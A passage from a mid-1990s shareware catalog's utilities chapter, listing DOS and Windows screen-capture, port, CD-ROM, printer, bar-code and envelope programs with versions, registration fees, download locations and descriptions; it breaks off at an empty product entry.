2, "Utilities" 81 + + + + Product: GEMCAP + Author: Natural Software, 708-377-7320 + Version: 4.02 (03-07-93) + Needs: IBM PC, DOS 3.0 or better. 4k RAM. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; 3-month + return policy; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: availability unknown on BBSs; GEMCAP.ZIP on CompuServe + in CIS:WPUSER forum LIBrary 16 (or contact userID 70047,744 for + assistance). + Download size: 35k (about three minutes with a 2400 baud modem) + Description: + Captures DOS text and graphics screens to individual GEM .IMG + format bitmap files. Preserves reverse video and colors for + black and white printing. Retains high res VGA/EGA fonts so + your screens print exactly as they look to the user. Very + useful for software documentation. Works with CGA, VGA, EGA, + graphics modes, and any 80 column text mode - 43 & 50 line + modes. Captured files load in WordPerfect and other programs + that import GEM .IMG files. + + + Product: Quilt + Create intriguing patterns/scrn saver option. See full + description on page 581. + + Product: SCP + Author: Christopher J. Noyes Software, 718-625-2262 + Version: 1.04 (11-18-94) + Needs: IBM PC, DOS 2.1 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Hercules monitor. + Strongly recommended: VGA monitor; Dual 720k floppy drives; + Hard disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse; Epson printer; EMS memory; XMS memory. + Registration fee: $0.00 (Canadian dollars) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: SCP104.ZIP on BBSs (call 718-625-0411 to download it at + no charge); SCP104.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 0 (or contact userID 71570,3055 for assistance). + Download size: 384k (about 29 minutes with a 2400 baud modem) + Description: + Captures DOS text screens and converts them to various graphic + file formats including .PCX .WPG .TIF .IMG. Allows changing + attributes and scaling. + + Chapter 2, "Utilities" 82 + + + + Product: SCROLLit + Author: Bromfield Software Products + Version: 1.8 (10-19-93) + Needs: IBM PC, DOS 3.1 or better. 9k RAM. + Registration fee: $17.00 + Registration benefits: lifetime unlimited CompuServe, mail + support; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: SCRLIT18.ZIP on BBSs; SCRLIT.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 3 (or contact userID 71054,3051 for + assistance). + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + A 9k TSR that captures lines of text that scroll off the top of + the video screen and stores them in compressed form in an XMS, + EMS or conventional memory buffer. Pressing the Scroll Lock + hotkey activates the TSR, letting you scroll back through the + saved information, line by line or page by page. Has a fast + search capability as well as a block-write feature that allows + you to mark a block of lines for writing to a disk file or + sending to your printer. + + + Product: Textshot + Author: McAdams Associates, 214-239-9646 + Version: 4.0 (02-03-95) + Needs: IBM PC, DOS 2.1 or better. 23k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; bonus utilities. + Look for: TSHOT4.ZIP on BBSs; TSHOT.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 3 (or contact userID 70353,1644 for + assistance). + SWREG#: 5219 + PsL#: 11951 + Download size: 31k (about three minutes with a 2400 baud modem) + Description: + Saves images from any character-mode screen of 80 columns or + greater to color or B/W PCX graphics files as well as to + standard ASCII text files. When running on a VGA Textshot + accurately captures user-loaded fonts. Features: image + clipping, selectable fonts, image inversion and color patterns. + + + 2.3.4 286/386/486-specific + + Product: BOOT.SYS + The heavy-duty configuration manager. See full description on + page 131. + + Chapter 2, "Utilities" 83 + + + + Product: DAZZLE + EGA/VGA super-kaleidoscope, image generator. See full + description on page 559. + + Product: HiMOVE + Upper memory manager. See full description on page 69. + + Product: QUICKEXT + Author: Feico Nater Shareware, 31-74-438373 + Version: 1.1 (01-01-92) + Needs: IBM AT (80286), DOS 2.0 or better. Specifically will not + operate on an 80386 or 80486 computer. + Registration fee: $0.00 + Registration benefits: Support. + Look for: QUICKEXT.* on BBSs; QUICKEXT.* on GEnie in 0 forum + LIBrary 0. + Download size: 14k (about one minute with a 2400 baud modem) + Description: + A TSR which speeds up access to extended memory. Uses + undocumented feature in 80286 which is not available on 80386. + + + Product: What-I-DID! for Windows + Windows 3.1 keystrokes/clicks productivity. See full + description on page 72. + + 2.3.5 Sound card + + See also: Utilities, Hardware utilities, CD-ROM. + + Product: Music Sculptor for Windows + MIDI sequencer with music keyboard window. See full + description on page 633. + + 2.3.6 Serial & parallel port + + Product: Alad_IRQ + Lets GEnie Aladdin software use any IRQ. See full description + on page 424. + + Product: CTS Serial Port Utilities + Author: Computer Telecommunication Systems, Inc., 404-263-8623 + Version: 1.2 (12-06-93) + Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime phone, fax, CompuServe, GEnie, mail + support; bonus utilities; discounts on other products; + + Chapter 2, "Utilities" 84 + + + + discounts on upgrades. 12-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: CTSSPU12.EXE on BBSs; CTSSPU.EXE on CompuServe in + CIS:IBMCOM forum LIBrary 7 (or contact userID 76662,2315 for + assistance); CTSSPU12.EXE on GEnie in IBMPC forum LIBrary 5 (or + contact userID J.JERRIM for assistance). + SWREG#: 1750 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + A "must have" set of com port testing and control utilities for + consultants, PC support personnel, and anyone with a + communication problem. Detects common problems such as multiple + ports at the same address (eg: two Com1 ports), PCs which can't + use Com4, mouse/modem IRQ conflicts, shared IRQs, serial ports + which can't generate IRQs, and conflicting BIOS assignments. + Identifies all serial ports by UART type (including T/Ports and + emulated UARTs), address, and the actual IRQ used. + + + Product: Serial File Copy + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 3.5 (06-01-94) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $30.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, mail + support; bonus utilities; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; SFC35.ZIP on CompuServe + in CIS:IBMCOM forum LIBrary 2 (or contact userID 70671,1340 for + assistance). + PsL#: 10907 + Download size: 68k (about five minutes with a 2400 baud modem) + Description: + Copies files, including entire directory trees, between IBM PC + compatibles at 115,200 baud. Uses 16 bit CRC, has on-line help, + many transfer options. Can copy entire hard disk directory + structure from one PC to another at one time. + + + 2.3.7 CD-ROM + + See also: Utilities, Hardware utilities, Sound card. + + Chapter 2, "Utilities" 85 + + + + Product: CD-QUICK Cache + Author: Circuit Systems, 609-875-5433 + Version: 1.20 (06-12-95) + Needs: IBM AT (80286), DOS 3.1 or better. 11k RAM; CD-ROM drive; + XMS memory. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 6). Lifetime free upgrading allowed. + Look for: CDQCK120.ZIP on BBSs (call 609-764-0812 to download it + at no charge); CDQCK.ZIP on CompuServe in CIS:PCHW forum + LIBrary 1 (or contact userID 72202,3043 for assistance). + SWREG#: 4214 + PsL#: 11726 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + This small TSR will dramatically improve the performance of + your CD-ROM drive by storing frequently read data in fast XMS + memory. Uses advanced caching techniques and dynamic read-ahead + buffering to insure top performance. Includes CDTEST to measure + your CD-ROM drive's performance and the Windows' QUICKMON + program to show cache statistics in real time. Comes with an + easy-to-use INSTALL program, so you can be up and running in + less than 60 seconds! Works with any CD-ROM drive. + + + Product: MicroPlayerCD(tm) + Author: Daniel Thomas, 714-524-5625 + Version: 1.03 (02-26-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM; Hard + disk; Mouse; CD-ROM drive. + Strongly recommended: VGA monitor; sound card. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; MPCD10.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 6 (or contact userID 72301,2164 for + assistance). + SWREG#: 2081 + Download size: 210k (about 16 minutes with a 2400 baud modem) + Description: + Play audio CDs on your computer's CD-ROM. Control of screen + layout; optional vertical display. Resizable to virtually any + size: half the height of an icon to as large as your screen; + button-driven control of your CD player including eject and "go + to track"; disc catalog database; display track #, elapsed + time, disc name, track name; stay on top; volume control; auto + resume playing when Windows halts your CD in mid-play. + + Chapter 2, "Utilities" 86 + + + + 2.4 Printer utilities + + See also: Utilities, Hardware utilities, Screen, Screen + capture; Spreadsheet applications, Spreadsheet utilities; + Database applications, Mailing list systems; Graphics, + Utilities, Graphic print screen. + + Product: CodeLister + Prints C source, TOC of function, # of lines. See full + description on page 473. + + Product: Drag and Drop Printing + Author: FLFSoft Inc. + Version: v2.0 (02-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $15.00 (add $1.50 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of mail support; all ASP-wide offers + (see page 6); discounts on other products; discounts on + upgrades. 3-month free upgrading allowed. + Look for: DDP20.ZIP on BBSs; DDP20.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 2 (or contact userID 75010,235 for + assistance). + PsL#: 11178 + Download size: 145k (about eleven minutes with a 2400 baud modem) + Description: + Simplifies printing most files under Windows 3.1. Printing a + file is as easy as dragging it from the file manager and + dropping it on the program icon. You have complete control over + all aspects of printing. You can set the margin lengths and + select between normal or sideways printing. Headings and/or + footers can be printed on each page. Features include simulated + duplex printing, "shell" printing of files and many other + features. + + + Product: Fonts Ink Fonts + Author: Software Co-op, 317-856-6052 + Version: 1 (01-04-93) + Needs: IBM AT (80286), Windows 3.1 or better. (Windows 3.1 + needed for TrueType fonts.). + Registration fee: $20.00 + Registration benefits: Master disks, phone support. Shareware + disks of other programs. + Look for: VARIOUS on BBSs (multiple files) (call 715-652-2758 to + download it at no charge). + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + An interesting specialized selection of TrueType and PostScript + fonts: + FIKeys KeyCaps (3 styles) + FIBox Word-in-a-box (also white on black) + + Chapter 2, "Utilities" 87 + + + + Fraction Fraction-making fonts + MadAve Solotype's Advertiser Gothic + Elite Prestige Elite (nbix) + FILCD 7-segment LCD (ni) + Torrance 9-pin dot matrix (nb) + FIArrows Arrows of all kinds + USBats Outlines of states, patriotic symbols + Stencil Letters & numbers (2 styles) + + + Product: GridForm + Author: Software Co-op, 317-856-6052 + Version: 1.0 (12-15-91) + Needs: IBM PC, DOS 2.0 or better. HP LaserJet printer. + Registration fee: $15.00 + Registration benefits: Master disks, phone support, disks with + other shareware. + Look for: GRIDFORM.ZIP on BBSs (call 715-652-2758 to download it + at no charge); GRIDFM.ZIP on CompuServe in CIS:PCHW forum + LIBrary 2 (or contact userID 76635,1670 for assistance). + Download size: 27k (about two minutes with a 2400 baud modem) + Description: + Easy-to-use graph/gridpaper maker. Uses storable templates. + Metric or English units of measure. Linear, log, or natural log + scales. Full control over index lines. Can make highlighted + stripes or even checkerboards. Can make macro or overlay files + for printing later. + + + Product: LASR_MAN + A laser/ink jet printer with many styles. See full description + on page 112. + + Product: MicroFox DOS Utilities + DOS Utilities for Printers, screens, files. See full + description on page 38. + + Product: ON-SIDE + Author: Expressware Corporation, 206-788-0932 + Version: 2.0 (10-20-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Epson printer. + Registration fee: $24.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; discounts on + + Chapter 2, "Utilities" 88 + + + + other products; discounts on upgrades. 1-month free upgrading + allowed. + Look for: ONSIDE.ZIP on BBSs (call 206-788-4008 to download it at + no charge); ONSIDE.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 6 (or contact userID 75226,2020 for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Easy-to-use sideways printing program. Ten font styles + included or create your own. Existing fonts can be edited using + the font editor. On-screen drawing makes the process easy. + Fonts can be magnified and stretched to over 25 sizes each. All + aspects of printing can be controlled: print can be double + struck for darker print, top and bottom can be set, character + width and height can be varied and letter spacing controlled. + + + Product: PCX2FNT + Converts PCX graphics To HP soft fonts. See full description + on page 114. + + Product: PrintGF + Author: Ravitz Software Inc. + Version: 1.22 (01-08-95) + Needs: IBM PC, DOS 3.0 or better. 384k RAM. + Registration fee: $34.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime fax, BBS, CompuServe, mail support. JPEG/TARGA/TIFF + interpreter for Windows. + Look for: PRINTGF.ZIP on BBSs (call 606-268-0577 to download it + at no charge); PRNTGF.ZIP on CompuServe in CIS:GRAPHSUP forum + LIBrary 8 (or contact userID 70431,32 for assistance). + PsL#: 11033 + Download size: 210k (about 16 minutes with a 2400 baud modem) + Description: + Provides an image printer (BMP, GIF, PCX, JPEG, TARGA, TIFF) + for DOS and Windows. Prints or displays image files on 9 and 24 + pin printers, Epson Stylus Color, Fargo Primera, HP LaserJet, + DeskJet, Canon BJ, BJC printers, PostScript, Star SJ-144, and + many others, and displays on EGA, VGA, VESA SVGA, HGC. Outputs + color or b/w with user selectable size, position, dithering, + brightness, contrast, gamma, edge smoothing, blur/sharpen, and + gray balance. + + Chapter 2, "Utilities" 89 + + + + Product: PrintGL + Author: Ravitz Software Inc. + Version: 1.54 (01-10-95) + Needs: IBM PC, DOS 3.0 or better. 256k RAM. + Registration fee: $50.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime fax, BBS, CompuServe, mail support. + Look for: PRINTGL.ZIP on BBSs (call 606-268-0577 to download it + at no charge); PRNTGL.ZIP on CompuServe in CIS:IBMHW forum + LIBrary 2 (or contact userID 70431,32 for assistance). + PsL#: 10217 + Download size: 265k (about 20 minutes with a 2400 baud modem) + Description: + A pen plotter emulator package for DOS and Windows (includes + PrintCAD). It prints HP-GL, HP-GL/2, and ADI data on Epson and + IBM 9 pin printers, Epson, Fujitsu, IBM, NEC, and Toshiba 24 + pin printers, HP LaserJet, DeskJet, PaintJet, HP-GL and HP-GL/2 + devices, Epson Stylus, Canon LBP, BJ, BJC printers, PDP + ProTracer, PostScript printers, and many others, displays on + CGA to VESA SVGA, and outputs PCX, EPS files. User selectable + pen width, color, shading, and paper size, magnification, etc. + + + Product: Rubicon Publisher + Full-featured typesetter with fonts. See full description on + page 241. + + Product: SEE (File Viewer) + File viewer with full built-in mouse support. See full + description on page 64. + + Product: Simply Labels + Author: SimpleWare + Version: 4.02 (02-11-93) + Needs: IBM PC, DOS 3.1 or better. 384k RAM. + Strongly recommended: Hard disk; Mouse. + Registration fee: $39.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, mail + support; bonus utilities. + Look for: SIMLAB42.ZIP on BBSs (call 709-489-6018 to download it + at no charge). + Download size: 271k (about 20 minutes with a 2400 baud modem) + Description: + Free form label program with many features and flexible + printing. Options include multiple copies, multiple labels + across, auto centering/indenting, envelopes, reports and many + more. Supports all printers. Also includes flexible sorting, + many types of searches, import/export, read dBase III files, + Date/Time stamps, auto numbering, non-printing lines, and many + more. Program is menu driven, has mouse support and on-line + help. Use for mailing labels, disk labels, cassette jackets, + numbered tickets. + + Chapter 2, "Utilities" 90 + + + + Product: STEENBURGH's STUFF + 21 batch utilities, input, output, etc. See full description + on page 130. + + Product: Top Fonts Sampler + A collection of eight TrueType scalable fonts. See full + description on page 141. + + Product: TSR Download + Author: Elfring Soft Fonts, 708-377-3520 + Version: 2.9b (09-01-91) + Needs: IBM PC, DOS 2.1 or better. HP DeskJet printer; HP + LaserJet printer. (DeskJet printer must have RAM cartridge). + Registration fee: $45.00 + Registration benefits: printed manual; 3 months of phone support; + bonus utilities. + Look for: TSRDL4.ZIP on BBSs; TSRDL*.ZIP on CompuServe in CIS:HP + forum LIBrary 4 (multiple files) (or contact userID 72417,3437 + for assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Memory resident soft font manager for LaserJet and DeskJet + printers locates fonts automatically and displays them in + English. Compresses LaserJet soft fonts to 1/6 their normal + size. TSR Download pops up over any application program to + allow easy font control. It even remembers what fonts are in + your printer. Select or delete fonts, control line spacing plus + much more. Requires 7K of RAM as a TSR or works from the + command line. Full DOS & Windows 3.0 support. New scalable font + support. + + + 2.4.1 Print spoolers + + Product: BabySpool + Author: Budget Software Company, 303-932-1705 + Version: 3.00 (01-02-95) + Needs: IBM PC, DOS 2.1 or better. 12k RAM; Hard disk. + Registration fee: $22.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, fax, BBS, CompuServe, mail support; 12-month return + policy; all ASP-wide offers (see page 6); discounts on other + products. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Built on our 10 years of expertise in the background printing + arena, this software provides a "no frills" yet powerful + spooling/despooling environment. Printing takes place in the + background, while you continue working in the foreground. + BabySpool's efficient background printing engine provides + superfast printing. In fact, it is so efficient that it can + + Chapter 2, "Utilities" 91 + + + + support several printers printing simultaneously. A DOS-based + TSR, and supports networks and Windows environments. + + + Product: DISK SPOOL II + Author: Budget Software Company, 303-932-1705 + Version: 5.04 (12-29-94) + Needs: IBM PC, DOS 2.1 or better. 20k RAM; Hard disk. + Registration fee: $44.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, fax, BBS, CompuServe, mail support; 6-month return + policy; site license; all ASP-wide offers (see page 6); + discounts on other products. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; DS2.EXE on CompuServe in + CIS:IBMSYS forum LIBrary 0 (or contact userID 70033,643 for + assistance). + Download size: 379k (about 28 minutes with a 2400 baud modem) + Description: + th + Now in its 10 year on the market, this software provides a + sophisticated background printing and document managment + facility. It includes a powerful popup print manager for + controlling your printing activities ... stop, start, hold, + release, and view documents; change print ports; multiple + copies; save after printing; and more. Fast and efficient + printing. Also works in Windows to provide a single background + printing enviroment across both DOS and Windows. + + + 2.4.2 Printer control + + Product: DMPLAS (Dot Matrix to LaserJet) + Translate IBM/Epson FX print to HP LaserJet. See full + description on page 109. + + Product: EnVision Publisher + Desktop publishing program (full-feature). See full + description on page 239. + + Product: ESF's European DeskJet Fonts + Soft fonts to print western European lang. See full + description on page 106. + + Product: ESF's European LaserJet Fonts + Soft fonts to print Western European lang. See full + description on page 109. + + Product: ESF's LaserJet Fonts & Util. + Soft fonts, printer drivers, & utilities. See full description + on page 110. + + Chapter 2, "Utilities" 92 + + + + Product: ESF's Scalable LJ III Fonts + Five scalable fonts for LJ3 & LJ4 printers. See full + description on page 111. + + Product: EZSET + Author: McAdams Associates, 214-239-9646 + Version: 2.1 (12-05-93) + Needs: IBM PC, DOS 2.1 or better. 78k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $20.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; bonus utilities. + Look for: EZSET21.ZIP on BBSs; EZSET.ZIP on CompuServe in + CIS:IBMHW forum LIBrary 2 (or contact userID 70353,1644 for + assistance). + Download size: 68k (about five minutes with a 2400 baud modem) + Description: + Lets you access all of your printer's features, including those + not available from the control panel. All you need to use it + effectively is your printer's manual. + + + Product: LPRINT + Formats & prints files for PS w/ borders, etc. See full + description on page 115. + + Product: LQ + Author: Granny's Old-Fashioned Software, 704-264-6906 + Version: 2.35 (10-01-90) + Needs: IBM PC, DOS 2.0 or better. 9-pin dot matrix printer. + Registration fee: $35.00 + Registration benefits: Printed manual, master disks, update + disk, support, commissions. + Look for: availability unknown on BBSs; LQ235.ZIP on CompuServe + in CIS:IBMHW forum LIBrary 2 (or contact userID 73577,230 for + assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Lets you obtains near-letter quality from 9-pin dot-matrix + printers in a variety of fonts. Works invisibly with your word + processor so you can continue to use familiar commands for + print options such as emphasized, underline, italics, etc. + Changing fonts can be done by inserting codes or by using LQ's + pop-up window. Customized spooler handles printing tasks + efficiently in the background. Also included: font editor, + banner printer, letterhead editor. + + Chapter 2, "Utilities" 93 + + + + Product: PCX2PCL + Convert PCX graphics to LaserJet macros. See full description + on page 114. + + Product: PPRINT + Author: Patri-Soft, 909-352-2820 + Version: 5.5 (11-22-91) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s); 3 months of BBS + support. 1-month return policy. + Look for: PPRINT55.ZIP on BBSs (call 909-352-2825 to download it + at no charge); PPRINT.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 6 (or contact userID 76347,2477 for assistance); + PPRINT55.ZIP on GEnie in IBMPC-615 forum LIBrary 5 (or contact + userID PATRISOFT for assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + A great ASCII file printing tool providing extensive file + selection and formatting. Uses printer definition files to + support any printer. Specify print size, margins, headings, + footings, line numbering, and even data selection. Print two + pages per piece of paper on a laser printer. Scans a directory + to select multiple files to print. Set lines per page and cols + per line. Featured in Dr. File Finder's Guide to Shareware. + + + Product: Print Commander! + Author: Sorcerer Software, 310-454-8900 + Version: 3.0s (09-14-93) + Needs: IBM PC, DOS 3.3 or better. 5k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive; + CGA monitor. Dot matrix or inkjet (bubble jet) printer. + Strongly recommended: VGA monitor. + Registration fee: $15.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: quick-reference card; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, CompuServe, mail + support; bonus utilities. + Look for: availability unknown on BBSs; PRNCOM.EXE on CompuServe + in CIS:IBMHW forum LIBrary 2 (or contact userID 71544,2475 for + assistance). + Download size: 22k (about two minutes with a 2400 baud modem) + Description: + Tired of pushing buttons and flipping switches on your dot + matrix or ink jet printer? Can't seem to find that manual so + you can reset the printer's default font? Is changing your + printer's settings more hassle than it's worth? If so, this + small memory resident printer utility lets you change your + printer's settings from the keyboard. Switch to near letter + quality mode, change fonts, print in proportional mode, and + perform several other printer functions with ease. + + Chapter 2, "Utilities" 94 + + + + Product: Pulsar for Windows + Author: Tesserax Information Systems, 714-840-8822 + Version: 3.0 (07-15-93) + Needs: IBM AT (80286), DOS 3.1 or better. EGA monitor; HP + LaserJet printer. VBRUN300.DLL. + Strongly recommended: VGA monitor; Hard disk; Mouse; Plotter. + Registration fee: $35.00 (add $2.95 for shipping to U.S. + addresses) (add $4.95 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6). 6-month free + upgrading allowed. + Look for: availability unknown on BBSs; PULSAR.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 6 (or contact userID 72247,1463 + for assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A full-featured Windows printer management program which allows + switching between PostScript & PCL modes on HP and compatible + printers. Virtually every possible printer feature can be + accessed through either the program's pull-down menus or quick- + access command buttons. + + + 2.4.3 UPCs & bar codes + + Product: GRAB Plus(r) + Envelope addressor & database. See full description on + page 97. + + Product: LABEL MASTER + Mailing list manager - PC Mag editors choice. See full + description on page 286. + + Product: LABELS-PLUS Labeling System + Author: GRAFTech Development Corporation, 517-487-2780 + Version: 3.0 (05-01-93) + Needs: IBM PC, DOS 3.2 or better. 378k RAM. + Strongly recommended: EGA monitor; Hard disk; Mouse. + Registration fee: $50.00 (add $6.00 for shipping to U.S. + addresses) (add $12.00 for shipping to Canadian addresses) (add + $25.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of phone, CompuServe, mail support; all ASP-wide offers + (see page 6). 1 free update disk(s) sent out. + Look for: LP.ZIP on BBSs; LP.ZIP on CompuServe in CIS:EPSON forum + LIBrary 0 (or contact userID 75210,3335 for assistance). + Download size: 196k (about 15 minutes with a 2400 baud modem) + Description: + Prints on over 300 different dot matrix printers including + Epson, IBM, Okidata, Panasonic and compatibles, without the + need for specialized bar code equipment. Support is provided + for UPC version A, UPC version E, UPC/EAN/IAN 13, UPC/EAN/IAN + 8, Interleaved 2 of 5, Standard 2 of 5, Code 39 and Code 128. + + Chapter 2, "Utilities" 95 + + + + Data may be entered through the keyboard or via either + delimited or fixed position ASCII files. Has complete on-line + help and mouse support is provided. + + + Product: PrintEnvelope + Complete mail addressing system for Windows. See full + description on page 98. + + Product: Quick-BAR! (Code) for Windows + Author: Mission Critical Software, 313-247-0394 + Version: 1.0 (10-27-93) + Needs: IBM AT (80286), Windows 3.1 or better. 60k RAM. + Registration fee: $19.00 (Canadian dollars) (add $6.00 (Canadian + dollars) for shipping to U.S. addresses) (add $8.00 (Canadian + dollars) for shipping to Canadian addresses) (add $20.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of fax, CompuServe, mail support; 1-month return policy; + LAN license; site license; all ASP-wide offers (see page 6); + discounts on other products. 1-month free upgrading allowed. + Look for: availability unknown on BBSs; QIKBAR.ZIP on CompuServe + in CIS:WINUSER forum LIBrary 0 (or contact userID 73127,77 for + assistance). + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + Prints bar code on any Windows compatible printer. Just type + the characters and it prints it quick, along with the text + description. Sticky parameter settings let you modify + characters per inch, bar code height, and x & y coordinate + position on the label. Takes only 60k, so you can leave it + "hanging around" and print codes when needed. Includes + spectactular digital clock. + + + Product: UnderBar + Automatic printing of POSTNET bar codes. See full description + on page 99. + + Product: WinGRAB for Windows + Windows phone contact mgr & envelope printing. See full + description on page 100. + + Product: WonderBar + TSR to print POSTNET bar code for mailing. See full + description on page 101. + + Chapter 2, "Utilities" 96 + + + + 2.4.4 Envelope addressers + + Product: APT Mailing Assistant + Author: APT Computer Solutions, Inc., 606-873-0589 + Version: 5.30 (01-15-95) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Epson printer. + Strongly recommended: Hard disk; HP LaserJet printer. + Registration fee: $24.95 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; all ASP-wide offers (see page 6). CASS certified + program. + Look for: APMAD530.ZIP on BBSs (call 606-233-0154 to download it + at no charge); APMAD.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 9 (or contact userID 73023,3037 for assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Prints envelopes or labels on Lexmark/IBM or HP compatible + laser printers, deskjet, and Epson compatible dot matrix + printers. Envelopes and some labels will have USPS approved + POSTNET codes to speed delivery. Also provides easy to use bulk + mail facility with zip code statistics and the capability to + print your bulk mail permit box if desired. Envelopes and + labels are printed in zip code sequence for easy bundling. + Multiple name and address files may be maintained to catagorize + mailing lists. + + + Product: APT Mailing Assistant (OS/2) + Author: APT Computer Solutions, Inc., 606-873-0589 + Version: 1.10 (01-15-95) + Needs: IBM 80386, OS/2 2.0 or better. Program can run safely on + a system with no hard disk and only one floppy disk drive; + Epson printer. + Strongly recommended: Hard disk; HP LaserJet printer. + Registration fee: $37.95 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades. 3-month + + Chapter 2, "Utilities" 97 + + + + free upgrading allowed. Registered version is CASS certified + by U.S. Postal Service. + Look for: APMAO110.ZIP on BBSs (call 606-233-0154 to download it + at no charge); APMAO.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 9 (or contact userID 73023,3037 for assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Easy to use program that prints several types of envelopes and + labels with delivery point bar codes using HP compatible laser, + deskjet, or Epson compatible dot matrix printers. Can reuse + laser label sheets when printing single labels. Has bulk mail + facility that can print your bulk mail permit box, multiple + address files, and import/export facility. + + + Product: 